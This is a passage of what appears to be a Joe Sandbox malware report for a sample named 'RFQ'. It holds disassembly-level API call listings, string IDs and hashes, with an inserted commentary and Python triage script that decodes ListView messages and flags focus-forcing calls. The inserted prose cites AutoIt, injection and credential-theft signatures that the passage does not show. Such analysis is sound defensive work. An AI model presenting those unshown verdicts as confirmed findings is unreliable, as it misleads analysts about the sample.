                                                                            • Opcode Fuzzy Hash: 3d19c941261f3d5c5d3c9d82421cc584eab45a8085d9665f1b876ae738af6b49
                                                                            • Instruction Fuzzy Hash: 1751A031A01116DBCB54DFA8C8508BEB7F6AF69320B204369E8A6D72C5DF39DD40C7A1
                                                                            APIs
                                                                            • CoInitialize.OLE32 ref: 0070369B
                                                                            • CoUninitialize.OLE32 ref: 007036A6
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0071FB94,?), ref: 00703700
                                                                            • IIDFromString.OLE32(?,?), ref: 00703773
                                                                            • VariantInit.OLEAUT32(?), ref: 0070380B
                                                                            • VariantClear.OLEAUT32(?), ref: 0070385D
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 636576611-1287834457
                                                                            • Opcode ID: fdba087230767b84d9c9ab700a61016ce1dde0d7f0664b22b98221587c6962b4
                                                                            • Instruction ID: 600b9bc7818de626b3f4ee9c11c694c16dc9fbbc3a2d4ad5b6c0b16e41eecb4c
                                                                            • Opcode Fuzzy Hash: fdba087230767b84d9c9ab700a61016ce1dde0d7f0664b22b98221587c6962b4
                                                                            • Instruction Fuzzy Hash: FD61AFB0608301EFD311DF58C889B6ABBE9AF45710F004A5DF9859B2D1D778EE44CB96
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 176396367-1994484594
                                                                            • Opcode ID: cda5c333390744281b81c7571df59934db4c023d711d2c69f81b8aa5580b28ad
                                                                            • Instruction ID: 29b4278804914f51433e379c81c6a03dd5dae53fe1c9359272f38aa66a5d706d
                                                                            • Opcode Fuzzy Hash: cda5c333390744281b81c7571df59934db4c023d711d2c69f81b8aa5580b28ad
                                                                            • Instruction Fuzzy Hash: 8A512322B063A28B8B249E7BC9C40BB73D3BF95710B60453CE48197745FF20DD4587A0
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF), ref: 006F32ED
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006F330E
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LoadString$_wcslen
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 4099089115-3080491070
                                                                            • Opcode ID: ae24ea320ac7002d6a96b71706ff7755285582d98a2ab3aa54e384760c2e69fe
                                                                            • Instruction ID: 99f0243ad71cee21c332ec1748a1400eeeae4f96f299eb7d334bba74adf944bb
                                                                            • Opcode Fuzzy Hash: ae24ea320ac7002d6a96b71706ff7755285582d98a2ab3aa54e384760c2e69fe
                                                                            • Instruction Fuzzy Hash: 0E51C072900219AACF11FBE0CD52EEEB77AAF14300F104169F505721A1EBB96F49CF69
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 1256254125-769500911
                                                                            • Opcode ID: ebcbd49e005e3a5b965654d2b2850ce39dae71ebcd567e29e31907515a6f677b
                                                                            • Instruction ID: c53a6c29b234bf1e071cfd4ac9c228862b2d0767b0e2c2bd9e16a4714500f26c
                                                                            • Opcode Fuzzy Hash: ebcbd49e005e3a5b965654d2b2850ce39dae71ebcd567e29e31907515a6f677b
                                                                            • Instruction Fuzzy Hash: AA41F532A023678ACB106F7E88905FFB7A7BF61764B245229E465D7384EB35CD81C790
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F52BE
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006F5334
                                                                            • GetLastError.KERNEL32 ref: 006F533E
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 006F53C5
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: d2b6590a3ec50e9dc73bad1d4368df6776f772b5a1ca564d41223ee6cd3194be
                                                                            • Instruction ID: 8940764b367086f596303d30fa3d0cc543d6adf260349e816fcbb08a9fe0d70c
                                                                            • Opcode Fuzzy Hash: d2b6590a3ec50e9dc73bad1d4368df6776f772b5a1ca564d41223ee6cd3194be
                                                                            • Instruction Fuzzy Hash: 0D319236A046089FC711DF6CC884AB9BBB6FB05344F148069E606DB392E7B5DD42CB91
                                                                            APIs
                                                                            • CreateMenu.USER32 ref: 00713BAC
                                                                            • SetMenu.USER32(?,00000000), ref: 00713BBB
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00713C43
                                                                            • IsMenu.USER32(?), ref: 00713C57
                                                                            • CreatePopupMenu.USER32 ref: 00713C61
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00713C8E
                                                                            • DrawMenuBar.USER32 ref: 00713C96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                            • String ID: 0$F
                                                                            • API String ID: 161812096-3044882817
                                                                            • Opcode ID: c3bd48f9abcbfe68f4a8f25525ea44974e952d92244e62359dfd55a0cd17b7db
                                                                            • Instruction ID: 34eefedbcc635a9398d64d5377c55f5ad98e2dc25936cf6d1c810ea11298e80f
                                                                            • Opcode Fuzzy Hash: c3bd48f9abcbfe68f4a8f25525ea44974e952d92244e62359dfd55a0cd17b7db
                                                                            • Instruction Fuzzy Hash: 0E416EB4601205AFDB14DFA8D854EEA7BB5FF89310F144429F915A7390D734AA50CF64
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007139D0
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007139D3
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 007139FA
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00713A1D
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00713A95
                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00713ADF
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00713AFA
                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00713B15
                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00713B29
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00713B46
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: 42a461a8239706b6a23548dd59ab763c9206fcbdfcd70e8f7e8c2377f1fe3734
                                                                            • Instruction ID: 8399ce31b65bc37fff89dea1aed8190906885e65c1c3c45033a68c4738677087
                                                                            • Opcode Fuzzy Hash: 42a461a8239706b6a23548dd59ab763c9206fcbdfcd70e8f7e8c2377f1fe3734
                                                                            • Instruction Fuzzy Hash: 2A617CB1900248AFDB20DFA8CC81EEE77B8EF09710F104199FA15A72D1D778AE81CB54
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 006EB06F
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB083
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 006EB08A
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB099
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 006EB0AB
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB0C4
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB0D6
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB11B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB130
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB13B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 27e7db7f3797a5c45b66722eb7295c9abff7b160b504c6e406a3e2ca5171fb61
                                                                            • Instruction ID: 9f1ef1e0399cc499b3a7a41676cb51620f4a95e06ae03021ed2ce737542b1229
                                                                            • Opcode Fuzzy Hash: 27e7db7f3797a5c45b66722eb7295c9abff7b160b504c6e406a3e2ca5171fb61
                                                                            • Instruction Fuzzy Hash: FC31D071501344BFDB159F69EC59BEB77BAEB05362F11D008F901D62D0E7B8AC428B68
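The SendMessageW listing at 007139D0 and the AttachThreadInput listing at 006EB06F above are easier to triage once the raw message numbers and the call pattern are decoded. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own "APIs" lines (copied in as constructed input), names the ListView messages behind the SendMessageW constants (documented LVM_* values, LVM_FIRST = 0x1000), and flags the GetForegroundWindow plus AttachThreadInput pairing, which is how a process attaches to the foreground thread's input queue to force focus onto its own window. Reading these blocks as the AutoIt interpreter's GUI and window-activation code, consistent with the report's "compiled AutoIt script" verdict, is an inference, and it is worth keeping in mind before spending time on them: the thread-injection and credential-theft signatures point at a later stage, not at this GUI code.

```python
"""Added triage helper, not part of the Joe Sandbox report or of the
sample: parse a function block's 'APIs' listing and annotate the call
sequence. REPORT_EXCERPT is constructed from two of the report's own
blocks; LVM_* values are documented Windows ListView message constants."""
import re

REPORT_EXCERPT = """\
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007139D0
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007139D3
• GetWindowLongW.USER32(?,000000F0), ref: 007139FA
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00713A1D
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00713A95
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00713ADF
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00713AFA
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00713B15
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00713B29
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00713B46
Memory Dump Source
APIs
• GetCurrentThreadId.KERNEL32 ref: 006EB06F
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB083
• GetWindowThreadProcessId.USER32(00000000), ref: 006EB08A
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB099
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB13B
Memory Dump Source
"""

LVM_NAMES = {  # LVM_FIRST is 0x1000; only the messages seen in the block
    0x1004: "LVM_GETITEMCOUNT",
    0x1008: "LVM_DELETEITEM",
    0x101D: "LVM_GETCOLUMNWIDTH",
    0x101E: "LVM_SETCOLUMNWIDTH",
    0x101F: "LVM_GETHEADER",
    0x104D: "LVM_INSERTITEMW",
    0x1057: "LVM_GETSTRINGWIDTHW",
    0x1074: "LVM_SETITEMTEXTW",
}

# One call line: '• Name.MODULE(arg,...), ref: ADDR'; the argument list is
# optional and '• Part of subcall function ...' lines do not match.
CALL_RE = re.compile(r"^\s*•\s+(?P<api>\w+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_blocks(text):
    """Group call lines by 'APIs' header into one list per function."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = m.group("args")
            current.append({"api": m.group("api"), "module": m.group("module"),
                            "args": [a.strip() for a in args.split(",")] if args else [],
                            "ref": int(m.group("ref"), 16)})
    return blocks


def decode_window_message(call):
    """LVM_ name of the msg argument of a SendMessageW call; None when the
    call is not SendMessageW or the plugin left the value unresolved ('?')."""
    if call["api"] != "SendMessageW" or len(call["args"]) < 2:
        return None
    try:
        msg = int(call["args"][1], 16)
    except ValueError:
        return None
    return LVM_NAMES.get(msg, f"unknown 0x{msg:04X}")


def classify(calls):
    """Return (decoded messages, analyst notes) for one function block."""
    apis = {c["api"] for c in calls}
    decoded = [d for d in map(decode_window_message, calls) if d]
    notes = []
    if {"GetForegroundWindow", "AttachThreadInput"} <= apis:
        # Attaching to the foreground thread's input queue lets a process
        # force focus or keystrokes onto a window; attributing it to the
        # AutoIt runtime's WinActivate-style helper is an assumption.
        notes.append("foreground input-queue attach (focus forcing)")
    if any(d.startswith("LVM_") for d in decoded):
        notes.append("ListView control messaging: GUI runtime code, not payload")
    return decoded, notes


def analyze_report(text):
    """One summary dict per function block found in the report text."""
    results = []
    for block in parse_blocks(text):
        decoded, notes = classify(block)
        results.append({"calls": len(block), "decoded": decoded, "notes": notes})
    return results


if __name__ == "__main__":
    for summary in analyze_report(REPORT_EXCERPT):
        print(summary)
```

The parser is deliberately tolerant of the plugin's own quirks: the second SendMessageW line at 007139D3 has its arguments shifted by one (msg shows as "?"), so the decoder returns None for it rather than guessing, and any message outside the small LVM_ table is reported as an unknown number instead of being silently dropped.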
                                                                            APIs
                                                                            • _free.LIBCMT ref: 006B2C24
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006B2C30
                                                                            • _free.LIBCMT ref: 006B2C3B
                                                                            • _free.LIBCMT ref: 006B2C46
                                                                            • _free.LIBCMT ref: 006B2C51
                                                                            • _free.LIBCMT ref: 006B2C5C
                                                                            • _free.LIBCMT ref: 006B2C67
                                                                            • _free.LIBCMT ref: 006B2C72
                                                                            • _free.LIBCMT ref: 006B2C7D
                                                                            • _free.LIBCMT ref: 006B2C8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 7408ac64affc599a166a134a4e7143061432ae11db226ea053b80cfe654a9756
                                                                            • Instruction ID: 37712164990f59b455a98ccc6b03f2b973bc2e5d91f47178bd7584c6fd3776a3
                                                                            • Opcode Fuzzy Hash: 7408ac64affc599a166a134a4e7143061432ae11db226ea053b80cfe654a9756
                                                                            • Instruction Fuzzy Hash: 3A11D7B620024ABFCB41FF55C862CDD3BA6FF09351F4144A8BA5C5B222DA31DAD19B44
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00682D64
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00682E03
                                                                            • UnregisterHotKey.USER32(?), ref: 00682FE8
                                                                            • DestroyWindow.USER32(?), ref: 006C3045
                                                                            • FreeLibrary.KERNEL32(?), ref: 006C30AA
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006C30D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: b66561a1034367605d91d0e6c34070f25b52592d10aaa4ad7183c41260fc83cf
                                                                            • Instruction ID: e93f3a82cff11ca547bd027ff01332dacc35b92ccded841797c78e5fb0e0a223
                                                                            • Opcode Fuzzy Hash: b66561a1034367605d91d0e6c34070f25b52592d10aaa4ad7183c41260fc83cf
                                                                            • Instruction Fuzzy Hash: CBD148317012228FCB19EF55C4A9B69F7A6FF05700F1482ADE54AAB351CB31AE16CF49
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(?,?), ref: 006F117A
                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 006F11A2
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 006F11C6
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F11F6
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F127D
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F12E2
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F134E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                            • String ID: %Jp
                                                                            • API String ID: 2550207440-2606009258
                                                                            • Opcode ID: f1f6bc4fb1f81cd25ea59dc6848718f1acb361b62b1845573c20ec8053a8dda3
                                                                            • Instruction ID: ac96338bef4907d2c3d7b9b8a2c833d09e040faf502415dcfda7191d7e73928b
                                                                            • Opcode Fuzzy Hash: f1f6bc4fb1f81cd25ea59dc6848718f1acb361b62b1845573c20ec8053a8dda3
                                                                            • Instruction Fuzzy Hash: FD91CF76A00219DFDB41DF98C885BFEB7BAFF06351F108029EA00EB291D775A941CB94
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 0068761A
                                                                              • Part of subcall function 006876AA: GetClientRect.USER32(?,?), ref: 006876D0
                                                                              • Part of subcall function 006876AA: GetWindowRect.USER32(?,?), ref: 00687711
                                                                              • Part of subcall function 006876AA: ScreenToClient.USER32(?,?), ref: 00687739
                                                                            • GetDC.USER32 ref: 006C52A2
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006C52B5
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006C52C3
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006C52D8
                                                                            • ReleaseDC.USER32(?,00000000), ref: 006C52E0
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006C5371
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: 4ef80044c70d2bd944a669dc169914605fe50b59b774917ddc86dedb2ed9f83c
                                                                            • Instruction ID: 181b7653b15553ebaacf3c4d243528f53e556272a8dd2f49b80e79a2632ce4b8
                                                                            • Opcode Fuzzy Hash: 4ef80044c70d2bd944a669dc169914605fe50b59b774917ddc86dedb2ed9f83c
                                                                            • Instruction Fuzzy Hash: E071FF30400644DFCF229F64CC84FFA3BB6FF09351F284269E95A5A2A6E775E881DB50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 176396367-1994484594
                                                                            • Opcode ID: 3e0118d27459ced3c97e250e613c58e50f1c199250668aa489efd0309272da0c
                                                                            • Instruction ID: 312315018d0fb82a8c33d448f4035cf58b37e2f0a52d1dcc6b4e8f4e1e474788
                                                                            • Opcode Fuzzy Hash: 3e0118d27459ced3c97e250e613c58e50f1c199250668aa489efd0309272da0c
                                                                            • Instruction Fuzzy Hash: 4B51E432B063A28BCB14DE7BC9945BA73E3BF95714B50062DE58197784EF20DE09C7A1
                                                                            APIs
                                                                              • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
                                                                            • _wcslen.LIBCMT ref: 006E4296
                                                                            • _wcslen.LIBCMT ref: 006E42F0
                                                                            • _wcslen.LIBCMT ref: 006E4337
                                                                            • _wcslen.LIBCMT ref: 006E437B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 1256254125-1994484594
                                                                            • Opcode ID: 3b7fab43c5d2df0643a62be2fa713a1082ef321027a4c5c9be12bafee4cc23e0
                                                                            • Instruction ID: 78208fbc65b9f163e61cf8a8b798a8424e4452a35657d43b1df15164087004be
                                                                            • Opcode Fuzzy Hash: 3b7fab43c5d2df0643a62be2fa713a1082ef321027a4c5c9be12bafee4cc23e0
                                                                            • Instruction Fuzzy Hash: D941D132B163928B8B14DE7BC8D44ABB3E3BF95710B60062DE58197785EF21DD09C790
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: _wcslen
• String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
• API String ID: 176396367-1994484594
• Opcode ID: 226ea31d24e7b13aab21fe9237731b69c4401414571aa154f897b5b10952ef0f
• Instruction ID: e55906138f02212c8fdc8b00a6f41ab2151e7fe501622fb10ab0935a6bb85790
• Opcode Fuzzy Hash: 226ea31d24e7b13aab21fe9237731b69c4401414571aa154f897b5b10952ef0f
• Instruction Fuzzy Hash: 78410532B163A28B8B14DE7BC9D04BA73D3BF95714B60062CE48197785FF21DD099790
APIs
  • Part of subcall function 00683536: _wcslen.LIBCMT ref: 00683541
  • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
• _wcslen.LIBCMT ref: 006E4296
• _wcslen.LIBCMT ref: 006E42F0
• _wcslen.LIBCMT ref: 006E4337
• _wcslen.LIBCMT ref: 006E437B
Similarity
• API ID: _wcslen$BuffCharUpper
